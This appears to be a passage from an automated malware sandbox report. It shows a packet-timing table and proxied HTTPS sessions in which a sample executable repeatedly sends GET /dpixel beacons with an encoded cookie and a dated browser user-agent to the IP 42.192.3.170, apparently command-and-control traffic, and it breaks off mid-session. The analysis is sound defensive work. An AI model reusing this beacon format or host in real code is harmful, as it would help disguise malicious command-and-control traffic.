                  Jan 3, 2025 02:55:33.615067959 CET50114443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:33.615257025 CET50114443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:33.615269899 CET4435011442.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:33.615305901 CET50114443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:33.615339041 CET50114443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:33.727431059 CET50115443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:33.727473974 CET4435011542.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:33.727533102 CET50115443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:33.727863073 CET50115443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:33.727878094 CET4435011542.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:34.891139984 CET4435011542.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:34.891221046 CET50115443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:34.891784906 CET50115443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:34.891796112 CET4435011542.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:34.893599987 CET50115443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:34.893605947 CET4435011542.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:35.425741911 CET4435011542.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:35.425796032 CET4435011542.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:35.425806046 CET50115443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:35.425837040 CET50115443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:35.426244020 CET50115443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:35.426263094 CET4435011542.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:35.426274061 CET50115443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:35.426306009 CET50115443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:35.539936066 CET50116443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:35.539979935 CET4435011642.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:35.540039062 CET50116443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:35.540360928 CET50116443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:35.540375948 CET4435011642.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:36.733549118 CET4435011642.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:36.737530947 CET50116443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:36.737530947 CET50116443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:36.737564087 CET4435011642.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:36.741455078 CET50116443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:36.741461039 CET4435011642.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:37.313539982 CET4435011642.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:37.313601017 CET4435011642.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:37.313605070 CET50116443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:37.313664913 CET50116443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:37.314042091 CET50116443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:37.314062119 CET4435011642.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:37.314073086 CET50116443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:37.314100981 CET50116443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:37.430705070 CET50117443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:37.430741072 CET4435011742.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:37.430800915 CET50117443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:37.431158066 CET50117443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:37.431169033 CET4435011742.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:38.633528948 CET4435011742.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:38.637655020 CET50117443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:38.637655020 CET50117443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:38.637679100 CET4435011742.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:38.641588926 CET50117443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:38.641592979 CET4435011742.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:39.187290907 CET4435011742.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:39.187347889 CET50117443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:39.187370062 CET4435011742.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:39.187391996 CET4435011742.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:39.187407970 CET50117443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:39.187434912 CET50117443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:39.187768936 CET50117443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:39.187783957 CET4435011742.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:39.187793970 CET50117443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:39.187829018 CET50117443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:39.305493116 CET50118443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:39.305548906 CET4435011842.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:39.305612087 CET50118443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:39.305902958 CET50118443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:39.305918932 CET4435011842.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:40.511488914 CET4435011842.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:40.511604071 CET50118443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:40.512032986 CET50118443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:40.512042999 CET4435011842.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:40.513289928 CET50118443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:40.513294935 CET4435011842.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:41.079471111 CET4435011842.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:41.079519987 CET50118443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:41.079545975 CET4435011842.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:41.079566002 CET4435011842.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:41.079590082 CET50118443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:41.079608917 CET50118443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:41.080240965 CET50118443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:41.080264091 CET4435011842.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:41.080274105 CET50118443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:41.080301046 CET50118443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:41.266036987 CET50119443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:41.266074896 CET4435011942.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:41.266144037 CET50119443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:41.273737907 CET50119443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:41.273751974 CET4435011942.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:42.477595091 CET4435011942.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:42.477792025 CET50119443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:42.478183031 CET50119443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:42.478194952 CET4435011942.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:42.481220007 CET50119443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:42.481226921 CET4435011942.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:43.031430006 CET4435011942.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:43.031482935 CET50119443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:43.031501055 CET4435011942.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:43.031516075 CET4435011942.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:43.031544924 CET50119443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:43.031568050 CET50119443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:43.031800985 CET50119443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:43.031816006 CET4435011942.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:43.031829119 CET50119443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:43.031862974 CET50119443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:43.149056911 CET50120443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:43.149095058 CET4435012042.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:43.149158001 CET50120443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:43.149458885 CET50120443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:43.149471998 CET4435012042.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:44.310333967 CET4435012042.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:44.310435057 CET50120443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:44.659033060 CET50120443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:44.659033060 CET50120443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:44.659053087 CET4435012042.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:44.659061909 CET4435012042.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:44.973918915 CET4435012042.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:44.973968983 CET50120443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:44.973984003 CET4435012042.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:44.974004984 CET4435012042.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:44.974024057 CET50120443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:44.974037886 CET50120443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:44.974211931 CET50120443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:44.974220991 CET4435012042.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:44.974240065 CET50120443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:44.974266052 CET50120443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:45.089204073 CET50121443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:45.089251041 CET4435012142.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:45.089303970 CET50121443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:45.089826107 CET50121443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:45.089837074 CET4435012142.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:46.267088890 CET4435012142.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:46.267183065 CET50121443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:46.267939091 CET50121443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:46.267942905 CET4435012142.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:46.269577026 CET50121443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:46.269582033 CET4435012142.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:46.804517984 CET4435012142.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:46.804574966 CET50121443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:46.804579973 CET4435012142.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:46.804622889 CET50121443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:46.804637909 CET4435012142.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:46.804671049 CET50121443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:46.805010080 CET50121443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:46.805032015 CET4435012142.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:46.805044889 CET50121443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:46.805075884 CET50121443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:46.925599098 CET50122443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:46.925638914 CET4435012242.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:46.925703049 CET50122443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:46.926318884 CET50122443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:46.926331043 CET4435012242.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:48.134654045 CET4435012242.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:48.135199070 CET50122443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:48.136929989 CET50122443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:48.136929989 CET50122443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:48.136940002 CET4435012242.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:48.136955023 CET4435012242.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:48.701129913 CET4435012242.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:48.701231003 CET4435012242.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:48.703399897 CET50122443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:48.703399897 CET50122443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:48.703484058 CET50122443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:48.820980072 CET50123443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:48.821019888 CET4435012342.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:48.821063042 CET50123443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:48.821943045 CET50123443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:48.821950912 CET4435012342.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:50.040415049 CET4435012342.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:50.040503025 CET50123443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:50.040941954 CET50123443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:50.040946960 CET4435012342.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:50.047090054 CET50123443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:50.047096014 CET4435012342.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:50.593255997 CET4435012342.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:50.593347073 CET50123443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:50.593353033 CET4435012342.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:50.593385935 CET4435012342.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:50.593409061 CET50123443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:50.593427896 CET50123443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:50.593750954 CET50123443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:50.593750954 CET50123443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:50.593765974 CET4435012342.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:50.593874931 CET50123443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:50.715099096 CET50124443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:50.715153933 CET4435012442.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:50.719173908 CET50124443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:50.719540119 CET50124443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:50.719556093 CET4435012442.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:51.934097052 CET4435012442.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:51.934251070 CET50124443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:51.934762955 CET50124443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:51.934772968 CET4435012442.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:51.936178923 CET50124443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:51.936182976 CET4435012442.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:52.501092911 CET4435012442.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:52.501179934 CET4435012442.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:52.501215935 CET50124443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:52.509577036 CET50124443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:52.519160986 CET50124443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:52.519160986 CET50124443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:52.519186974 CET4435012442.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:52.519355059 CET50124443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:52.648360968 CET50125443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:52.648394108 CET4435012542.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:52.648518085 CET50125443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:52.649054050 CET50125443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:52.649061918 CET4435012542.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:53.853291035 CET4435012542.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:53.857594967 CET50125443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:53.857594967 CET50125443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:53.857611895 CET4435012542.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:53.861143112 CET50125443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:53.861149073 CET4435012542.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:54.409611940 CET4435012542.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:54.409769058 CET4435012542.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:54.415023088 CET50125443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:54.415023088 CET50125443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:54.415066957 CET50125443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:54.523452044 CET50126443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:54.523495913 CET4435012642.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:54.523612022 CET50126443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:54.523957968 CET50126443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:54.523972988 CET4435012642.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:55.704550982 CET4435012642.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:55.704608917 CET50126443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:55.705123901 CET50126443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:55.705136061 CET4435012642.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:55.706825018 CET50126443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:55.706830025 CET4435012642.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:56.241082907 CET4435012642.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:56.241141081 CET4435012642.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:56.241274118 CET50126443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:56.241569996 CET50126443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:56.241569996 CET50126443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:56.241591930 CET4435012642.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:56.241818905 CET50126443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:56.355103970 CET50127443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:56.355134010 CET4435012742.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:56.355379105 CET50127443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:56.355607986 CET50127443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:56.355613947 CET4435012742.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:57.510479927 CET4435012742.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:57.510560989 CET50127443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:58.224313021 CET50127443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:58.224328995 CET4435012742.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:58.226993084 CET50127443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:58.226999044 CET4435012742.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:58.541183949 CET4435012742.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:58.541235924 CET50127443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:58.541244030 CET4435012742.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:58.541290998 CET50127443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:58.541733027 CET50127443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:58.541743040 CET4435012742.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:58.541753054 CET50127443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:58.541788101 CET50127443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:58.648755074 CET50128443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:58.648797989 CET4435012842.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:58.648853064 CET50128443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:58.649086952 CET50128443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:58.649101019 CET4435012842.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:59.842756033 CET4435012842.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:59.842839003 CET50128443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:59.843275070 CET50128443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:59.843281031 CET4435012842.192.3.170192.168.2.4
                  Jan 3, 2025 02:55:59.844451904 CET50128443192.168.2.442.192.3.170
                  Jan 3, 2025 02:55:59.844456911 CET4435012842.192.3.170192.168.2.4
                  Jan 3, 2025 02:56:00.376768112 CET4435012842.192.3.170192.168.2.4
                  Jan 3, 2025 02:56:00.376821995 CET4435012842.192.3.170192.168.2.4
                  Jan 3, 2025 02:56:00.376826048 CET50128443192.168.2.442.192.3.170
                  Jan 3, 2025 02:56:00.376873970 CET50128443192.168.2.442.192.3.170
                  Jan 3, 2025 02:56:00.377177000 CET50128443192.168.2.442.192.3.170
                  Jan 3, 2025 02:56:00.377193928 CET4435012842.192.3.170192.168.2.4
                  Jan 3, 2025 02:56:00.377214909 CET50128443192.168.2.442.192.3.170
                  Jan 3, 2025 02:56:00.377237082 CET50128443192.168.2.442.192.3.170
                  Jan 3, 2025 02:56:00.492949009 CET50129443192.168.2.442.192.3.170
                  Jan 3, 2025 02:56:00.492984056 CET4435012942.192.3.170192.168.2.4
                  Jan 3, 2025 02:56:00.493046045 CET50129443192.168.2.442.192.3.170
                  Jan 3, 2025 02:56:00.493403912 CET50129443192.168.2.442.192.3.170
                  Jan 3, 2025 02:56:00.493416071 CET4435012942.192.3.170192.168.2.4
                  Jan 3, 2025 02:56:01.694232941 CET4435012942.192.3.170192.168.2.4
                  Jan 3, 2025 02:56:01.694382906 CET50129443192.168.2.442.192.3.170

                  HTTP Request Dependency Graph

                  • 42.192.3.170

                  HTTPS Proxied Packets

                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  0192.168.2.44973042.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:51:57 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:51:57 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:51:57 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  1192.168.2.44973142.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:51:58 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:51:59 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:51:59 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  2192.168.2.44973242.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:52:00 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:52:01 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:52:01 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  3192.168.2.44973342.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:52:02 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:52:03 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:52:02 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  4192.168.2.44973442.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:52:04 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:52:05 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:52:04 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  5192.168.2.44973542.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:52:06 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:52:06 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:52:06 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  6192.168.2.44973642.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:52:08 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
